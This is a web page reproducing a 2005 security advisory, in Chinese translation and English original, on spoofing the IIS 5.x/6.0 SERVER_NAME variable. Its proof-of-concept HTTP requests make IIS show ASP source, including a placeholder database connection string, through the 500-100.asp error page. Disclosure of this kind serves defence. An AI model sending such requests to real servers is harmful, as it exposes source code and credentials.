Remote IIS 5.x and IIS 6.0 Server Name Spoof

简介: http://book.51cto.com/art/201110/295931.htm 作者: Inge Henriksen组织:[Bug.

http://book.51cto.com/art/201110/295931.htm 

作者: Inge Henriksen
组织:[Bug.Center.Team-漏洞预警中心小组]
翻译: 剑心[BCT]
备注:非完整翻译(只针对重要性进行翻译),请根据原版进行参考.
IIs 5.0 5.1 6.0可以通过提交修改过的http请求来进行远程的"SERVER_NAME"参数欺骗.这样就可以通过IIS 500-100.asp错误页面来潜在地显示敏感的asp代码,该欺骗漏洞同样可以潜在的利用在一系列在第三方站点上的漏洞程序和web服务上.

技术细节描述
微 软的系列IIS在当主机"SERVER_NAME"参数是"localhost"的时候就会显示一些敏感信息.当"SERVER_NAME"主机变量是 "localhost"的时候,如果一个asp页面运行时有一个错误,那么该错误行的代码就会在浏览器中显示出来.如果你可以欺骗该 "SERVER_NAME" IIS参数,那么就可以让IIS显示你所要的东西.其他第三方web应用程序或者web服务如果信任该主机变量的话将同样受到该漏洞的影响.

被欺骗的"SERVER_NAME"主机变量可以通过asp中的request.servervariables("SERVER_NAME")或者. NET中的HttpContext.Current.Request.ServerVariables("SERVER_NAME")来访问,其他的程序 语言都有相应的方法来取得该变量,但是都存在着被欺骗的漏洞.

如果HTTP的请求来自远程的客户端,那么服务器的 "SERVER_NAME"变量就会返回web服务器自己的IP地址.但是如果HTTP请求来自与web服务器自己相同IP,那么 request.servervariables("SERVER_NAME")将会返回"localhost".这样就可以用来在web应用程序和 web服务中欺骗,浏览该web服务器的是服务器本身.遇到这样的情况web应用程序和web服务就会被欺骗从而显示管理界面给浏览者.一个利用该漏洞的 例子就是IIS 5.x 500-100.asp页面,该页面就是根据判断该主机变量从而决定是否显示发生错误的代码.

该主机变量的专业描述是"服务器的主机名,域名或者在self-referencing URLs中显示的IP地址".这样,在一些代码中就经常引用该变量来探测IP是否是服务器本身,这就带来了一系列的非法利用如Cookie窃取,数据转向或者其他的URL处理中.

有很多其他的应用程序利用了该变量,MSDN也为程序开发者举了很多应用程序被利用这个漏洞而攻击的例子.其中最严重的是Microsoft .NET SDK护照的例子,任何建立在这上面的web应用程序或者web服务都因为这个缺陷而存在漏洞.
Vendor Status: Notified 28. January 2005



原版:
It is possible to remotely spoof the "SERVER_NAME" Microsoft® Internet Information Server® 5.0, 5.1 and 6.0 server variable by doing a modified HTTP request. Thus potentially revealing sensitive ASP code through the IIS 500-100.asp error page, the spoof also opens up a potential range of exploits in third party web applications and web services.

Technical Description
Microsoft® IIS 5.x ® shows sensitive information if the "SERVER_NAME" IIS 5.x server variable is "localhost". If a IIS 5.x ASP page has an error, the code on the fault line in the ASP page is shown in the browser, but only if"SERVER_NAME" IIS server variable is "localhost". One can spoof the "SERVER_NAME" IIS server variable so that it shows whatever one want. Other third party web applications or web services may also be vulnerable if authentication depends on the validity this server variable. IIS 6.0 is vulnerable to the spoof, but it's 500-100.asp page is not vulnerable.

The IIS server variable that can be spoofed is the "SERVER_NAME", it can be accessed through request.servervariables("SERVER_NAME")withASP,andHttpContext.Current.Request.ServerVariables("SERVER_NAME")with .NET, other programming languages have other methods to access this server variable, but are equally vulnerable.

If the HTTP request comes from a remote client, then the server variable "SERVER_NAME" returns the IP address of the web server itself. If the HTTP request came from the same IP as the web server (thus the request came from the an authenticated user browsing from the web server itself), then request.servervariables("SERVER_NAME") returns "localhost". This fact is used as "proof" in web applications or web services that the person browsing the web server is in fact browsing from the web server itself. The web applications or web services may use this proof to display an administrative interface to the web browser user if such is the case. One exploitable example is the IIS 5.x 500-100.asp page(Note: the IIS 6.0 500-100.asp page is no vulnerable); the page uses the server variable to determine if to display the code where the error occurred.

The technical description of the server variable is "The server's host name, DNS alias, or IP address as it would appear in self-referencing URLs", it is therefore often used to determine the IP address of the web server itself in once code, this opens up for a range of exploits including cookie-stealing, data redirection, and other URL manipulation issues.

There are many other applications that utilize validity of this server variable, and MSDN holds many examples for developers that are easily exploitable with this bug; among the most serious are the Microsoft® .NET Passport SDK examples, any web application or web service based on these examples are probably vulnerable due to the bug.

Vendor Status: Notified 28. January 2005 but still no fix availible.

Confirmed applications: Microsoft® Internet Information Server® 5.0, Microsoft® Internet Information Server® 5.1 and Microsoft® Internet Information Server® 6.0.

Confirmed platforms: Microsoft® Windows® 2000 with SP4, Microsoft® Windows® XP Professional with SP2, Microsoft® Windows® 2003 with SP1.

Proof of concept #1
Ok, you will need some sort of telnet client for this:

1. Create a ASP called test.asp on the IIS web root and add the following code:
<% response.write request.servervariables("SERVER_NAME") %>

2. Try and access it from a remote server with telnet. Use the following HTTP request(Note: always do a double ENTER after a HTTP request to indicate end of request message):
GET /test.asp HTTP/1.0

3. The reply is the IP address of the web server, as one would expect.
4. Try and access it from the webserver itself. Use the following HTTP request:
GET /test.asp HTTP/1.0

5. The reply is "localhost", as one would expect.
6. Try and access it from a remote server with telnet again. This time use the following HTTP request:
GET http://localhost/test.asp HTTP/1.0

7. It replies "localhost", you have just fooled IIS to think that the HTTP request came from a user browsing from the web server itself.


Proof of concept #2
This PoC will show you how to get IIS 5.x to reveal code in a page that is not functioning correctly by tricking IIS's 500-100.asp to think that the HTTP request came from the webserver itself. In the IIS page 500-100.asp that reveals the ASP code if an error occurres. The 500-100.asp code snip looks like this(take especially note of the bold letters):

--- Snip from the IIS file <webroot>/IISHelp/common/500-100.asp ---
strServername = LCase(Request.ServerVariables("SERVER_NAME"))
strServerIP = Request.ServerVariables("LOCAL_ADDR")
strRemoteIP = Request.ServerVariables("REMOTE_ADDR")
If (strServername = "localhost" Or strServerIP = strRemoteIP) And objASPError.File <> "?" Then
Response.Write Server.HTMLEncode(objASPError.File)
If objASPError.Line > 0 Then Response.Write ", line " & objASPError.Line
If objASPError.Column > 0 Then Response.Write ", column " &
objASPError.Column Response.Write "<br>"
Response.Write "<font style=""COLOR:000000; FONT: 8pt/11pt courier
new""><b>"
Response.Write Server.HTMLEncode(objASPError.Source) & "<br>"
If objASPError.Column > 0 Then Response.Write String((objASPError.Column - 1),
"-") & "^<br>"
Response.Write "</b></font>"
blnErrorWritten = True
End If
...

Here you see that Microsoft&reg; assumes that if the Request.ServerVariables("SERVER_NAME") equals "localhost"then the code where the bug happened is returned to the client making the HTTP request.
A normal HTTP request might look like this:
GET /test.asp HTTP/1.0

But by adding "http://localhost/" then you will see that the contents of Request.ServerVariables("SERVER_NAME") changes to "localhost". Like this:
GET http://localhost/test.asp HTTP/1.0

Not only localhost works, one can fake it to anything:
GET http://www.someserver.xom/test.asp HTTP/1.0
GET http://198.2.168.1/test.asp HTTP/1.0

Now, armed with this knowledge, let us ge down-and dirty to reveal some code remotely:

1. Create a global.asa file on the root of your IIS web root that has the following contents:
<script LANGUAGE=VBScript RUNAT=Server>
sub Application_OnStart()
Application("SQLConn") = Provider='sqloledb';Data Source=192.168.2.1;Initial Catalog=Test;User Id=someuser;Password=somepassword;"
end sub
</script>

2. Try and access the web from a remote server with telnet. Use the following HTTP request:
GET / HTTP/1.0

3. The reply does not reveal the code on the "Application("SQLConn")..." line, as it should since IIS 5.x recognizes you as beeing on a remote client. It does however tell you that there is a error on the page.

4. Now try the following HTTP request instead:
GET http://localhost/ HTTP/1.0

5. The reply displays the code, since the IIS server thinks you are browsing from the webserver:

Microsoft VBScript compilation (0x800A03EA) Syntax error 127.0.0.1//global.asa, line 3, column 34
Application("SQLConn") = Provider='sqloledb';Data Source=192.168.2.1;Initial Catalog=Test;User Id=someuser;Password=somepassword;"

目录
相关文章
|
7月前
25、IIS服务器搭建(win server 2003)
25、IIS服务器搭建(win server 2003)
77 0
|
Web App开发 负载均衡 测试技术
使用IIS Server Farms搭建应用服务负载均衡
当公司的业务扩大, 伴随着大量的请求,应用服务器的承受能力已经不能满足不断增长的业务需求,使用IIS Server Farms搭建应负载均衡的方式,把请求分发给不同的应用服务器进行处理,这个时候就降低了应用服务器的压力。
2374 0
|
5月前
|
弹性计算 持续交付 Docker
阿里云云效产品使用合集之如何部署到阿里云服务器上的 Windows Server 上的 IIS
云效作为一款全面覆盖研发全生命周期管理的云端效能平台,致力于帮助企业实现高效协同、敏捷研发和持续交付。本合集收集整理了用户在使用云效过程中遇到的常见问题,问题涉及项目创建与管理、需求规划与迭代、代码托管与版本控制、自动化测试、持续集成与发布等方面。
|
4月前
|
开发框架 .NET API
Windows Server 2022 安装IIS 报错 访问临时文件夹 C:\WINDOWS\TEMP\3C 读取/写入权限 错误: 0x80070005
Windows Server 2022 安装IIS 报错 访问临时文件夹 C:\WINDOWS\TEMP\3C 读取/写入权限 错误: 0x80070005
170 0
|
5月前
|
前端开发 JavaScript 应用服务中间件
windows server + iis 部署若伊前端vue项目
5,配置url重写规则(重写后端请求) 注:如果没有Application Request Routing Cachefourcloudbdueclaim和URL重写,则是第二部的那两个插件没装上 打开iis,点击计算机->点击Application Request Routing Cache -> 打开功能
281 0
|
7月前
|
Kubernetes 网络安全 Windows
要在云效部署到阿里云服务器上的 Windows Server 上的 IIS
【2月更文挑战第18天】要在云效部署到阿里云服务器上的 Windows Server 上的 IIS
500 4
|
7月前
|
存储 网络安全 数据安全/隐私保护
Windows Server 2019 IIS HTTPS证书部署流程详解
Windows Server 2019 IIS HTTPS证书部署流程详解
615 0
|
Windows
windows server 2008 r2 IIS服务403-禁止访问访问被拒绝
windows server 2008 r2 IIS服务403-禁止访问访问被拒绝
248 0
|
Linux iOS开发 MacOS
IIS10 部署网站报【HTTP 错误 500.19 - Internal Server Error】的解决办法
原有的 web 发布文件是可以正常部署 IIS10 上面运行的,由于本地电脑环境迁移,重新换了一个宿主机部署 IIS10,网站运行提示如下信息:HTTP 错误 `500.19 - Internal Server Error` 无法访问请求的页面,因为该页的相关配置数据无效。详细错误信息:模块 `IIS Web Core` 通知 `未知 处理程序 尚未确定 错误...
1945 0
IIS10 部署网站报【HTTP 错误 500.19 - Internal Server Error】的解决办法
25、IIS服务器搭建(win server 2003)
25、IIS服务器搭建(win server 2003)
79 0
25、IIS服务器搭建(win server 2003)